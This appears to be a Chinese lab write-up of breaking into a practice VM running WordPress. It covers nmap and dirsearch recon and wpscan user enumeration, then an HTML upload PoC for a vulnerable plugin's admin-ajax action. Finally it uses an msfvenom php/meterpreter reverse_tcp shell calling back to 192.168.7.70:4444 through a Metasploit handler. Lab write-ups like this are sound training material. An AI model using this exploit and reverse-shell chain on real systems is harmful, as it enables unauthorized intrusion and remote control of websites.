1. 信息收集:
1.1. 主机扫描
nmap -sn '192.168.7.0/24'|grep -B 2 '08:00:27:C9:02:09'
1.2. 端口扫描80、3306
nmap -p- 192.168.7.99
1.3. 目录扫描
dirsearch -u 192.168.7.99
1.4. 操作系统等敏感信息查看
2. 漏洞扫描+漏洞利用
2.1. 老规矩,进入主页点击可能存在的功能点
发现不是404,就是无用跳转,无果;-》查看是否存在有信息-》翻找到没文档根目录,拼接从尝试-》对其进行访问使用火狐插件Wappalyzer发现站点为Wordpress5.3.18
2.2. 利用wpscan查找密码
wpscan --url http://ip/g@web -e u
拼接地址进行查找http://IP/g@web/index.php/wp-json/wp/v2/users/?per_page=100&page=1
发现了第一个密码:hackNos@9012!!,尝试在熟知的wordpress框架默认登陆后台wp-login.php进行登录-》无果;
IP/g@web/wp-login.php
2.3. 利用wpscan查找nday漏洞
wpscan --url http://IP/g@web -e vp --api-token 密钥API
#-e vp: 该选项表示 WPScan 将枚举插件(vp 即 vulnerable plugins)的漏洞。
#--api-token 密钥API: 使用 WPScan API Token 进行扫描,这是用来访问 WPScan 在线数据库的密钥,确保扫描结果的准确性和全面性。密钥可在网站申请Sign Up | WPScan
具体申请流程请移步【5分钟内解决困扰】:《wpscan》免费密钥API申请-CSDN博客
选择其中一个远程代码执行漏洞-》对其提供的网站进行查阅-》复制官方的poc数据包
将下方POC代码存储为POC.html文件-》此处如果是直接复制官网的话,给的是https协议,改成http协议就好;
<form method="post" enctype="multipart/form-data" action="http://漏洞机IP/wp-admin/admin-ajax.php">
<input type="hidden" name="action" value="wpsp_upload_attachment">
Choose a file ending with .phtml:
<input type="file" name="0">
<input type="submit" value="Submit">
</form>
After doing this, an uploaded file can be accessed at, say:
http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml2.4. 获取shell
利用msf创建shell反弹文件-》启动msf监听-》通过刚才生成的POC.html上传shell.phtml文件-》访问shell.phtml文件,反弹shell
####生成后门文件[在攻击机上生成]
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.7.70 LPORT=4444 x> shell.phtml
####开启监听
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.7.70
set LPORT 4444
run
####Shell上传页面
http://192.168.7.99/g@web/wp-content/uploads/wpsp/
####调用/bin/bash【最后反弹shell时使用】
python -c 'import pty; pty.spawn("/bin/bash")'- ####生成后门文件【在攻击机上生成】
- ####开启监听
- 打开POC.html文件,上传shell.phtml文件;
- 由于网站会强改上传的文件名称-》通过访问目录-》点击访问shell.php文件-》msf反弹到shell
http://IP/g@web/wp-content/uploads/wpsp/
- 获shell
